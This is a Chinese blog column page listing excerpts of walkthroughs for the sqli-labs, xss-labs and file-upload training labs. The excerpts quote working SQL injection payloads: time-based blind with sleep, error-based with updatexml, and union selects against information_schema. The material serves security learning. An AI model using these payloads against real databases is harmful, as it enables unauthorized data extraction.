OWASP
文章平均质量分 53
空白行
.
展开
-
xss-labs-test1-test20
简述跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚原创 2022-04-15 13:34:07 · 1403 阅读 · 0 评论 -
sql注入第15关
闭合符号465 'or 1=1#查看数据库名-1 'or if(length(database())=8,sleep(2),1)#-1' or if((ascii(substr((database()),1,1)))=115,sleep(2),1)#查看表名-1' or if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1原创 2022-03-15 12:52:34 · 688 阅读 · 0 评论 -
sql注入第11关
这关采用post的方式传参定闭合符使用’ or 1=1 # 回显正常使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了)实现原理查询列数’ order by 2 #’ order by 3 #所以有两列找显示位查数据库名'union select 1,database()#查表名' union select 1,group_concat(table_name) from information_schema.tables where tab原创 2022-03-14 17:55:26 · 4029 阅读 · 0 评论 -
sql注入21-27关
21关经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密解密后base64编解码地址:https://tool.oschina.net/encrypt?type=3可以推出,我们需要在burp suite上将编码后的内容输入') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回原创 2022-04-01 10:02:48 · 3088 阅读 · 0 评论 -
sql注入第十关------延时注入
第十关和第九关一样都使用了延时注入127.0.0.1/sqli-labs-master/Less-10/?id=1" and (sleep(2))--+但是闭合符号变成了双引号具体操作详见第九关https://blog.csdn.net/qq_45751902/article/details/123471177?spm=1001.2014.3001.5501...原创 2022-03-14 11:01:45 · 379 阅读 · 0 评论 -
sql注入第12关------布尔类型
本关和第11关相比,只是闭合符不同") or 1=1 #参考第11关原创 2022-03-14 18:21:11 · 135 阅读 · 0 评论 -
sql注入第九关------延时注入
这关无论输入什么闭合符号回显都是正确的,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。先引入几个函数1.if(Condition,A,B)函数2.当Condition为TRUE时,返回A;当Condition为FALSE时,返回B。3.sleep()函数 网页延迟n秒后,输出结果4.left()函数 左边数,取几个数5.substr(var1, var2, var3) 功能:从字符串里截取其中一段字符(串) - va原创 2022-03-14 10:39:31 · 4465 阅读 · 0 评论 -
sql注入第13关------报错注入和联合注入
闭合符') or 1=1 #结果没有回显,可以考虑延时注入,布尔盲注和报错注入但是延时注入对于错误和正确没有时间区别,所以不能用报错注入有回显,所以布尔盲注就不用了admin') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#既然已经确定是报错注入和联合注入了,那么和前面的差不多了。...原创 2022-03-14 21:08:05 · 541 阅读 · 0 评论 -
sql注入第十四关------延时注入和布尔盲注
闭合符号465" or 1=1#列数465" order by 2#465" order by 3#所以确定有两列,但是没有回显,尝试延时注入数据库名" or if(length(database())>8,sleep(2),1)#" or if(length(database())>7,sleep(2),1)#不知道为什么这个时间远远大于2秒,但是可以判断出数据库名的字符串长度为8,接下来就和第九关和第十关类似了,判断每个字符的ascii码,然后再asci原创 2022-03-15 10:21:30 · 3253 阅读 · 0 评论 -
sql注入16-20
16-20关的解释,新手的那些疑问原创 2022-03-31 16:18:36 · 1786 阅读 · 0 评论 -
文件上传(第1-19关)
lastIndexOf() 方法可返回一个指定的字符串值最后出现的位置,在一个字符串中的指定位置从后向前搜索。 stringObject.lastIndexOf(searchvalue,fromindex) searchvalue 必需。规定需检索的字符串值。 fromindex 可选的整数参数。规定在字符串中开始检索的位置。它的合法取值是 0 到 stringObject.length - 1。如省略该参数,则将从字符串的最后一个字符处开始检索。注释:lastIndexOf() 方法对大小写敏原创 2022-04-02 20:54:24 · 1766 阅读 · 0 评论 -
2021年OWASP-TOP10
2021年OWASP-TOP10原创 2022-06-23 16:27:36 · 1020 阅读 · 0 评论